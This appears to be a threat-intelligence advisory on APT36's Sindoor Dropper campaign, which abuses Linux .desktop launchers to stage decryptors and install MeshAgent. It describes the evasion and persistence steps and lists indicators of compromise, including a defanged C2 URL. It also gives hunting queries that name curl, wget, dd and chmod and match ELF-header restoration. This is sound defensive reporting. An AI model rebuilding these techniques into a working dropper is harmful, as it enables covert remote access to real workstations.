Follow on X RSS Feed
Phishing

Sindoor Dropper Phishing Exploits Linux Desktop Files for Persistent Remote Control

Cybersec Sentinel

5 min read
Sindoor Dropper Phishing Exploits Linux Desktop Files for Persistent Remote Control

Threat Group: Transparent Tribe / APT36 / Mythic Leopard / G0134
Threat Type: Targeted phishing dropper, Linux desktop shortcut abuse, remote administration tool deployment, cyber espionage
Exploited Vulnerabilities: No public CVE exploitation confirmed. Abuse of Linux .desktop launcher behaviour, user execution, weak attachment controls, and trusted cloud storage delivery.
Malware Used: Sindoor Dropper (Go based multi stage dropper), MeshAgent remote administration agent as the final payload.
Threat Score: 🔴 High (7.9/10) – Full remote control on Linux workstations through multi stage obfuscation, anti analysis, and legitimate admin tool abuse; credible targeting of government and defence networks.
Last Threat Observation: 2 September 2025

Overview

A sophisticated cyber espionage campaign designated Sindoor Dropper is actively targeting Indian organisations. Attribution with high confidence points to APT36 also known as Transparent Tribe. The operation shows a strategic shift. Rather than Windows centric chains, the operators focus on Linux workstations. Initial access arrives as a weaponised .desktop file delivered by spear phishing. The launcher opens a decoy PDF while starting a multi stage chain that restores a corrupted decryptor, decrypts a downloader, performs anti virtualisation checks, and finally deploys MeshAgent for full remote control via WebSocket over TLS. The abuse of a legitimate administration agent complicates detection and response. The campaign uses lures aligned to current events to increase click through and trust.

Key Details

Delivery Method: Spear phishing ZIPs contain a .desktop launcher named to mimic a PDF. On double click the launcher opens a benign PDF from trusted cloud storage while background commands fetch and execute staged components.
Target: Government and defence entities that use BOSS Linux and other Linux desktops, with potential spill over to education and adjacent contractors.
Functions:
• Initial access through user execution of a disguised .desktop launcher
• Multi stage download, decryption, and execution of Go based components
• Anti virtualisation and sandbox checks prior to final payload
• Deployment of MeshAgent for remote command execution and file transfer
• Persistence through autostart entries and scheduled tasks or services
• Encrypted WebSocket based command and control

Obfuscation: The first stage decryptor is a Go binary packed with UPX whose ELF magic bytes are intentionally stripped to evade static scanning on cloud platforms. The .desktop launcher restores those bytes at runtime using printf and dd. Strings across stages are obfuscated using Base64 and DES CBC. The chain enforces a minimum uptime and checks vendor and MAC address artefacts linked to virtual machines.

Attack Vectors

The campaign abuses the Linux .desktop mechanism. The launcher’s Exec line chains shell commands that write helpers to disk, restore headers, decrypt the next stage with a hard coded password, and remove artefacts. Successive stages repeat this pattern until MeshAgent is written and started. Persistence is achieved by writing entries into user autostart paths or by creating cron or systemd tasks. Traffic blends in by using WebSockets over TLS to dynamic DNS backed domains that resolve to cloud infrastructure.

MITRE ATT&CK Mapping

Initial Access: T1566.001 Spearphishing Attachment
User Execution: T1204.002 Malicious file execution
Execution: T1059 Command and scripting interpreter
Persistence: T1219 Remote access software
Defense Evasion: T1027 Obfuscated files or information; T1027.002 Software packing
Masquerading: T1036.008 Masquerade as a document and official domain
Virtualisation/Sandbox Evasion: T1497.001 Environment checks
Deobfuscate/Decode: T1140 Stage decryption
Command and Control: T1071.001 Application layer protocol (WebSocket over TLS); T1568.002 Dynamic resolution
Discovery: T1082 System information discovery

Known Indicators of Compromise (IoCs)

MD5 File Hashes

  • 8a7ac7c3511a452198e08eb68c5f8948

SHA1 File Hashes

  • 38aa8d51695fe3c137ccaf17ca3fe4fb407b3b22
  • 0fdb1ed6f48dd53970ea4a2df12d8c6bda835f37
  • 2647c69233ed1f361e9cb4722531d782b8c43282
  • 494f2cca6e937e367f32eed4076907e3f60b83aa
  • e75f8aeea12457cb5b5ae8fb1fee2593d3ab9887

SHA256 File Hashes

  • 05b468fc24c93885cad40ff9ecb50594faa6c2c590e75c88a5e5f54a8b696ac8
  • 0f4ef1da435d5d64ccc21b4c2a6967b240c2928b297086878b3dcb3e9c87aa23
  • 231957a5b5b834f88925a1922dba8b4238cf13b0e92c17851a83f40931f264c1
  • 38b6b93a536cbab5c289fe542656d8817d7c1217ad75c7f367b15c65d96a21d4
  • 6879a2b730e391964afe4dbbc29667844ba0c29239be5503b7c86e59e7052443
  • 6b1420193a0ff96e3a19e887683535ab6654b2773a1899c2ab113739730924a1
  • 9943bdf1b2a37434054b14a1a56a8e67aaa6a8b733ca785017d3ed8c1173ac59
  • 9a1adb50bb08f5a28160802c8f315749b15c9009f25aa6718c7752471db3bb4b
  • a6aa76cf3f25c768cc6ddcf32a86e5fcf4d8dd95298240c232942ce5e08709ec
  • b46889ed27b69b94fb741b4d03be7c91986ac08269f9d7c37d1c13ea711f6389
  • ba5b485552ab775ce3116d9d5fa17f88452c1ae60118902e7f669fd6390eae97

URLs

  • hxxp://boss-servers[.]gov[.]in[.]indianbosssystems[.]ddns[.]net:443/agent[.]ashx

Hostnames

  • boss-servers[.]gov[.]in[.]indianbosssystems[.]ddns[.]net
  • indianbosssystems[.]ddns[.]net

Detection and Hunting Aids

Elastic style
• .desktop execution with suspicious tooling:
event.category:process AND process.command_line:("*.desktop" AND (curl OR wget OR dd OR chmod OR xxd))
• Header restoration behaviour:
process.command_line:("printf \\x7FELF" AND dd AND mayuw)
• MeshAgent beacon:
network.url.path:/agent.ashx AND destination.port:443 AND destination.domain:*ddns.net

Splunk style
• Suspicious launcher chain:
index=edr sourcetype=linux:process_exec (process="*.desktop" (curl OR wget OR xxd OR dd OR chmod)) | stats count by host user parent_process process
• MeshAgent C2:
index=proxy OR index=fw uri_path="/agent.ashx" dest_port=443 dest_host="*.ddns.net" | stats values(src_ip) values(user) by dest_host

Sigma like logic
• Title: Linux desktop launcher abuses cloud decoy and staged decryptors
Selection: Exec contains curl OR wget OR xxd OR dd piping into chmod or dd. PDF opened by firefox within 10 seconds of launcher event.
Condition: selection within a short window

Mitigation and Prevention

User Awareness
• Teach Linux users that .desktop files can execute commands. A PDF icon is not proof of safety. Encourage use of a text editor to inspect for [Desktop Entry] headers and suspicious Exec lines.
• Promote reporting of emails that reference current events and include archives with a single .desktop file.

Email Filtering
• Quarantine .desktop files inside archives for non developer groups. Flag ZIPs with a single .desktop that mimics a PDF name.
• Expand and detonate cloud storage links at the email boundary. Block downloads that deliver executable content as documents.

Endpoint Protection and Hardening
• Require explicit trust before GNOME or KDE runs a downloaded .desktop file. Ensure downloaded launchers are non executable until attributes are changed.
• Deploy EDR for Linux workstations. Alert on .desktop execution from user writable paths that invoke curl, wget, xxd, dd, chmod.
• Detect UPX packed Go binaries written to /tmp that run soon after a .desktop launch.
• Maintain allow lists for remote administration tools. If MeshCentral is not approved, alert or block MeshAgent binaries and their C2 patterns.
• Use AppArmor or SELinux to constrain user applications.

Identity and Access
• Enforce multifactor authentication for email and admin access. Remove unnecessary sudo from user accounts. Monitor for unusual sign ins that align with endpoint anomalies.

Response Guidance

• If a launcher is found, isolate the host. Capture volatile artefacts. Collect the .desktop file and helpers from temp paths. Dump active processes and open network connections. Preserve browser history around execution time.
• If MeshAgent exists, extract its configuration to enumerate other agents and controlling servers. Rotate credentials used on the host. Review for lateral movement.
• Hunt for siblings under the same dynamic DNS and for other WebSocket sessions to unusual hosts.

Risk Assessment

Impact: High. Successful infection gives the operator remote interactive access to Linux workstations in sensitive networks with a path to credential theft, lateral movement, and data exfiltration.
Likelihood: Moderate to High in environments with Linux desktops and weak attachment controls.
Exposure: Elevated for Indian government, defence, and affiliated contractors and education. Elevated for mixed OS fleets with fewer controls on Linux.
Compensating Factors: Strong email filtering, launcher handling rules, and Linux EDR coverage reduce risk.

Conclusion

Sindoor Dropper shows the continued evolution of APT36 and a clear intent to compromise Linux desktops through believable lures and native launcher abuse. The chain blends social engineering, staged decryption, anti analysis, and a legitimate administration agent to maximise access and minimise detection. Organisations that harden Linux workstation execution paths, block launcher content at the email layer, and monitor for WebSocket beacons to dynamic DNS infrastructure are better positioned to detect and contain this threat.

Podcast Section

No dedicated podcast episode focused on this campaign was identified at this time. Use general coverage of APT36 and Linux malware trends from reputable sources for situational awareness.

Sources

• Nextron Systems – Sindoor Dropper New Phishing Campaign
• The Hacker News – Transparent Tribe Targets Indian Govt With Weaponized Desktop Shortcuts via Phishing
• BleepingComputer – APT36 hackers abuse Linux .desktop files to install malware in new attacks
• CYFIRMA – APT36 Targets Indian BOSS Linux Systems with Weaponized AutoStart Files